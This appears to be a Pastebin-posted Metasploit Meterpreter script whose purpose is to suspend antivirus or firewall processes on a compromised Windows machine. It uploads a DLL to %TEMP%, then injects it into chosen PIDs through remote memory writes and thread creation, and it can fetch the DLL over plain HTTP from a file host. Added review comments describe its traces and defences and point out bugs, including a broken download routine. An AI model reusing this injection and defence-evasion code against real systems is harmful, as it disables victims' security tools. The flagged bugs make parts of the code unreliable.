suspend_resilientprocess.rb

a guest
Aug 23rd, 2011
211
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
#
# This script uses the Suspender DLL to suspend a Windows process, ideally a resilient one such as an AV or a stateless firewall.
# To do this, the script uploads the library to the target system and then opens the resilient process to suspend; once the
# target process is open it generates a payload of type "windows/loadlibrary", allocates memory in the process, writes the
# payload into that memory and finally creates a thread in the process to execute the DLL.
# After 'n' seconds the target process and its child processes and threads are suspended (that part is the DLL's behaviour,
# not visible in this script). The 'n' seconds is taken from the DLL filename:
# for example, Suspender10.dll suspends the target process and its children after 10 seconds.
#
# Version 1.0
# written by Adastra.
#
# NOTE(review): this is a Meterpreter post-exploitation script. The host/network artifacts it produces, read off the code below:
#   - a file named Suspender<seconds>.dll written under %TEMP% on the target (see uploadFile),
#   - a PROCESS_ALL_ACCESS open followed by a remote thread creation in each target PID (see loadProcceses),
#   - in download mode, a plain-HTTP fetch of the URL in url_suspender_dll from the operator's machine, with no integrity check.
# Suspending or tampering with security tooling from a user session is the behaviour to alert on; AV/EDR processes that
# refuse full-access handle opens from ordinary callers (protected-process / anti-tamper settings) stop the technique at the open.
#
# Script variables
require 'net/http'
require 'uri'

session = client
wininfo = client.sys.config.sysinfo   # collected but never read anywhere in this script


# Script arguments
@@exec_opts = Rex::Parser::Arguments.new(   # NOTE: a class variable (@@) outlives one run of the script in the same console
    "-h" => [ false,"Help Menu."],
    "-p" => [ true,"List of processes to suspend in the remote machine, each separated by ','." ],   # values are used as PIDs (to_i) in loadProcceses, not names
    "-s" => [ true,"Number of seconds before suspend the process(es)." ],
    "-f" => [ true,"Specify the path of Suspender.dll in the local machine (attacker) to upload in the remote machine." ],
    "-d" => [ true,"Download from a website in Internet. If you don't use this option neither '-f' option the default value will used to download the library from internet"]
)

processes = []
file_suspender_dll = nil
url_suspender_dll = 'http://www.fileserve.com/file/kBSgbw4/Suspender.dll'   # default download source; plain HTTP, unauthenticated, unverified
downloadMode = true
seconds_to_suspend = nil

  36. def usage
  37.     print_line("ScriptThis Script use the Suspender dll's Library to suspend a windows process, ideally a resilient process like an AV or Stateless Firewall. ")
  38.     print_line("Para do this, the script uploads the library in the target system and after open the resilient process to suspend, once opened the target process, ")
  39.     print_line("this script generates a payload of type 'windows/loadlibrary', after this, will try to allocate a memory space to load the library in the process, ")
  40.     print_line("the allocated memory into the process and finally create a thread to execute the dll. ")
  41.     print_line("When pass 'n' seconds, the target process will be suspended and his process and threads childs, will be suspended too. ")
  42.     print_line("the 'n' seconds corresponds to the value specified in the dll's filename,  ")
  43.     print_line("for example: Suspender10.dll will suspend the target process and his childs in 10 seconds. In the Script  ")
  44.  
  45.     puts @@exec_opts.usage
  46.     print_line("Example Usage:")
  47.     print_line("run suspendProcess -p process1[,process2,processN] -f PATH_OF_SUSPENDER_DLL")
  48.     print_line("run suspendProcess -p process1[,process2,processN] -d URL_OF_SUSPENDER_DLL")
  49.     raise Rex::Script::Completed
  50. end
  51.  
# Optionally fetches the Suspender DLL over HTTP, then uploads it to %TEMP% on the target.
#
# client   - the Meterpreter client used for expand_path and upload_file
# file     - local path of the DLL to upload; overwritten with a path under Msf::Config.data_directory when download is truthy
# download - when truthy, fetch the DLL from url before uploading
# url      - download source
# seconds  - delay encoded into the DLL filename, Suspender<seconds>.dll, on both the local and the remote side
#
# Returns the remote path of the uploaded file, or '' when the upload raised (the caller does not check for this).
# Raises RuntimeError when the local file does not exist.
def uploadFile(client,file,download,url,seconds)
    uploadedFile=''
    if download
        print_status("Trying to download Suspender from #{url}")

        suspender_dll = Net::HTTP.get URI.parse(url)   # plain GET: no TLS requirement and no checksum/signature check on the binary
        file = File.join(Msf::Config.data_directory, "Suspender#{seconds}.dll")
        # NOTE(review): fd.write(file) writes the path string, not the fetched body held in suspender_dll,
        # so download mode saves the path text to disk rather than the DLL.
        File.open(file, "wb") { |fd| fd.write(file) }
        print_status("Suspender10.dll has been downloaded to #{file} (local machine). Please remove manually after use or keep for reuse.")   # message hard-codes "10" regardless of seconds
    end

    if not ::File.exists?(file)   # File.exists? is deprecated and removed in Ruby 3.2; File.exist? is the current name
            raise "File to Upload does not exists!"
        else
            location = client.fs.file.expand_path("%TEMP%")
            fullPath = "#{location}\\Suspender#{seconds}.dll"   # on-disk artifact left on the target: %TEMP%\Suspender<seconds>.dll
            begin
                print_status("Uploading #{file}....")
                client.fs.file.upload_file(fullPath, file)
                print_status("successfully uploaded to #{fullPath}!")
                uploadedFile = fullPath
                rescue ::Exception => e   # rescuing Exception also swallows SystemExit/Interrupt; StandardError is the usual choice
                    print_error("Raised a exception uploading the DLL in the remote machine Maybe the library has been uploaded before... #{e}")
            end
    end
    uploadedFile;   # '' on upload failure
end

  80. def loadProcceses(session,processes_to_suspend,pathtosuspend)
  81.     ret=''
  82.    
  83.     print_status "Path Library: #{pathtosuspend}"
  84.     processes_to_suspend.each do |process|
  85.         begin
  86.             print_status "Trying to suspend the process with PID: #{process}"
  87.             payload = client.framework.payloads.create("windows/loadlibrary")
  88.             payload.datastore['DLL'] = pathtosuspend
  89.             payload.datastore['EXITFUNC'] = 'thread'
  90.             raw_payload = payload.generate
  91.             targetprocess = client.sys.process.open(process.to_i, PROCESS_ALL_ACCESS)
  92.             memory = targetprocess.memory.allocate(raw_payload.length + (raw_payload.length % 1024))
  93.             targetprocess.memory.write(memory, raw_payload)
  94.             targetprocess.thread.create(memory, 0)
  95.             rescue ::Exception => e
  96.                 print_error("Error allocating memory in the target process with PID #{process} the error is: #{e}")
  97.                 print_error("following with the next process in the list");
  98.                 ret = "#{ret} Error allocating memory in the target process with PID #{process}\n"
  99.         end
  100.         ret = "#{ret} The signal to suspend the #{process} has been submitted\n"
  101.     end
  102.     ret;
  103. end
  104.  
# Main: parse the script arguments, then upload the DLL and inject it into the listed PIDs.
@@exec_opts.parse(args) {
|opt, idx, val|

    case opt
    when "-p"
        processes.concat(val.split(","))   # comma-separated PIDs; loadProcceses applies to_i to each entry
    when "-d"
        url_suspender_dll = val
        print_status "The Suspender library will be downloaded from Internet, you need internet connection to make this work..."
        downloadMode=true;
    when "-f"
        file_suspender_dll = val
        print_status "File to upload: #{file_suspender_dll} "
        if not ::File.exists?(file_suspender_dll)   # File.exists? is deprecated and removed in Ruby 3.2; File.exist? is the current name
            print_error("file not found/accessible!")
            usage
        end
        downloadMode=false;   # -f and -d are order-dependent: whichever comes last wins

    when "-s"
        seconds_to_suspend = val
        if seconds_to_suspend.to_i <= 0
            print_error("Number of seconds to suspend the process must be greater than zero!")   # reported only; the value is still used below
        end
        print_status "Setting the number of seconds to suspend the process at #{seconds_to_suspend}"
    when "-h"
        usage
    else
        print_error "Invalid Option: #{opt}"
        usage
    end
}

# -s defaults to "10" when not supplied (kept as a string; it is only interpolated into filenames)
if seconds_to_suspend == nil
    print_status "Setting the number of seconds to default (10 seconds) if you want to change that, you should use the '-s' option"
    seconds_to_suspend = "10"
end
# No check that any PID was supplied: with an empty list loadProcceses only prints the library path.
file_suspender_dll = uploadFile(client, file_suspender_dll,downloadMode,url_suspender_dll,seconds_to_suspend) #if file_suspender_dll
print_status loadProcceses(session,processes,file_suspender_dll)   # uploadFile returns '' on upload failure; that empty path is passed on unchecked